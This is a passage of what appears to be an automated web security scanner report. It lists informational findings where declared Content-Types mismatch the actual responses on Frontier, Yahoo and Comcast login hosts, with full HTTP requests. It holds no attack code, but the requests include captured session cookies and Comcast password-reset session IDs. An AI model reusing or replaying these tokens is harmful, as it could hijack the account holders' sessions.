Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87AC969D42D890DD653C91255184546D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40986728");

25.15. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The response contains the following Content-type statement: The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Content-Length: 542
Content-Type: text/css
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:38 GMT

<STYLE TYPE="text/css">
   h1,p{
       margin:0px !important;
   }
   .tableft{
       background-image:url(../Images/tableft.gif);
   }
   .tabright{
       background-image:url(../Images/tabright.gif);
   }
   #tabm
...[SNIP]...

25.16. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The response contains the following Content-type statement: The response states that it contains JSON. However, it actually appears to contain plain text.

Request

POST /Controls/SharedWebMethods.aspx/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 2

""

25.17. http://frontier.my.yahoo.com/e/js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://frontier.my.yahoo.com
Path:   /e/js

Issue detail

The response contains the following Content-type statement: The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /e/js?_action=show&_subAction=getThumbnail&ids=%5B%22id-482243%22%2C%22id-482610%22%5D&start=0&maxItems=6&test=&_id=a81b32&_tags=%5B%5D&_txnid=2&_crumb=O2TJF8Qm5TbVJKQVIyb0I.&_mode=json HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; myc=d=lgdbPCk32jI29Q_3alrTFdhUdvOS62KbYqbV15OhgNs5GX2tKBQbpx35R0zRmbc2LUGd9sm6Lxpmg9WFDPpxD__c009fz2GVX66td5mnZiW9ywKdpzLhUpvxPx0_YO8eLJoOmTCvIsU8dDnHSWUDxusuL9oofD8AewPqJHs645ckvFUSiZu58gMSalbacmvEfnPeELo1NplZ5H_oqzFeO8oDRo2YEgWvthq8q6VXUFZGvUFYTsX0Ch0O1C2lcf9XCCOjpDQMZJUMyxiaGSYFyQf7RTgcBtAylyd7gThn4Q1pX01g2Ad71BW5.EMxvBmfLZRYnVhVx2p9Hg3WuT.vWOvGVQqDsCX12VG21FoM&v=2; myc_s=d=nOa115432jLC_cSLwuu_lf4CTd6wQPmHPCA2hP1vQO94THfsuViFbH9mcyI_cr0GP9r0rbetQe8z05xV0Z2o4v5lJRZq8SECI0sk60MsqlHumxoaEan_CngqSvJugqGvksvtgsUNoY8vL9_WpFoPYA5m101VjH_Pitvzb_GmYa019lCJFv2m_NEOXzQtq88.KW.F1SW5xpMo5OCinwcf0GL2rIl_kSrzrG.HFpDrEfGrrxXa18kfeCfkRX1QRTUCkse0NtJ63f4d2bPZUUp6IKxQ.C2G0OdbxWhxiMkjTmH0JcuI3jcyENUWnjYBj6dd7nxfqt_liAQa2Fwu9j37WJ.uQsq4ifKSL7i_6ftSyEgKdKhwyM6bY_BY.daS4egAYqHbhrR.g97x2ik02QNDK01volhxF5DES8RS6IaT3J4kbDJKNubXAO6Y_l02pZGmiRaKpmpaztnZZY_uwIWGVCTbDHJPpswsjyjP5Dcq0XIm1tkmPP2OrOSbmUWmft2JHYnOn2TmUuDZHZWA1X0RI4H8QHD39X5im7fBk7hIskxCD0kfgLG3KUPqJu.EsvuVefk.._mcFbJ0Wtxy4x9x_jt54PqFCbOQoObGtvHFevI25eKgw6kz6OQKwmHA10QFFqyBvqy0abhz9r_HlgX7F6z61jFeREhCedssKNsUjJ.qOvQ39C..SfEF80O7fwUowNksedhAHbANPtVyXDhD0ZlbIeUp_PVZhGmurZ9iB1nbQWrdgzuEOPhhoCHVq3E8RvzDzDJPZ198uGLqzzGoqyyNVyl8yPvY.IGWZBbEWla74QSx6sa5J8C6Z2ckXD_vcuihU_amd6fVcjiXIMr4cHxHd2h.1zlF4gU-&v=2; MYTMI=4; MYTCK=AgBOZhIQAE%2FJEABiqRAAIboQAHvh

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6IjAzZzRmbnA3NmM0aTAiO3M6MjoibXQiO2k6MTMxNTMxMjE5Mjt9; expires=Fri, 06-Sep-2013 12:29:52 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:52 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: U_mtupes=deleted; expires=Mon, 06-Sep-2010 12:29:51 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/json; charset=utf-8
Content-Length: 166

[{"_status":1,"html":null,"_error":"We noticed you may have signed in or signed out in another window. Click OK to reload your page.","_errorCode":2048,"_txnid":"2"}]

25.18. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.frontier.com
Path:   /WebAnalysis/APP/GenerateCode.ashx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /WebAnalysis/APP/GenerateCode.ashx?pagefilename=homepage& HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 3314
Cache-Control: private, max-age=14379
Date: Tue, 06 Sep 2011 12:45:50 GMT
Connection: close

try{var s_account='oberonfrontier';
var s=s_gi(s_account);
GameCatalog.WebAnalysis.SiteTracking.Replacer.symbols = {'%%tcp-disconnect-status%%' : function(){ return GameShell.GetTcpDisconnectStatus
...[SNIP]...

25.19. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://games.frontier.com
Path:   /graphics/frontier/1000/site/favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /graphics/frontier/1000/site/favicon.ico HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 8
Date: Tue, 06 Sep 2011 12:45:41 GMT
Connection: close

404 oops

25.20. http://ips-invite.iperceptions.com/webValidator.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:22 GMT
Content-Length: 1262

var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=9
...[SNIP]...

25.21. https://login.comcast.net/myaccount/images/overlay-bg.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/overlay-bg.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/overlay-bg.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2792

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

25.22. https://login.comcast.net/myaccount/images/sprites/base.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/base.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/base.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:33 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14752

.PNG
.
...IHDR...h................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

25.23. https://login.comcast.net/myaccount/images/sprites/gradient.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/gradient.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/gradient.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=487
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 5060

.PNG
.
...IHDR..............i.r....tEXtSoftware.Adobe ImageReadyq.e<...yPLTE.........................................................,,,...===............888.........777555......666..."""###%%%)))99
...[SNIP]...

25.24. https://login.comcast.net/myaccount/images/sprites/xfinity_sprite.png

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/images/sprites/xfinity_sprite.png

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /myaccount/images/sprites/xfinity_sprite.png HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:29 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=314
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8117

.PNG
.
...IHDR...J...^.............tEXtSoftware.Adobe ImageReadyq.e<....PLTE.$(.&)....MS...700......."&................ &.vy............iii.NS....$)....$(.....!..........wx...................#'....\
...[SNIP]...

25.25. https://login.comcast.net/myaccount/js/additional-methods.min.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/additional-methods.min.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/additional-methods.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=498
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8689

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

25.26. https://login.comcast.net/myaccount/js/jquery-1.5.2.min.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery-1.5.2.min.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/jquery-1.5.2.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 85925

/*!
* jQuery JavaScript Library v1.5.2
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

25.27. https://login.comcast.net/myaccount/js/jquery.validate.min.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/jquery.validate.min.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/jquery.validate.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=499
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20943

/**
* jQuery Validation Plugin 1.8.0
*
* http://bassistance.de/jquery-plugins/jquery-plugin-validation/
* http://docs.jquery.com/Plugins/Validation
*
* Copyright (c) 2006 - 2011 J..rn Zaefferer

...[SNIP]...

25.28. https://login.comcast.net/myaccount/js/omniture.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...

25.29. https://login.comcast.net/myaccount/js/scripts.min.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://login.comcast.net
Path:   /myaccount/js/scripts.min.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /myaccount/js/scripts.min.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:31:08 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=495
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2435

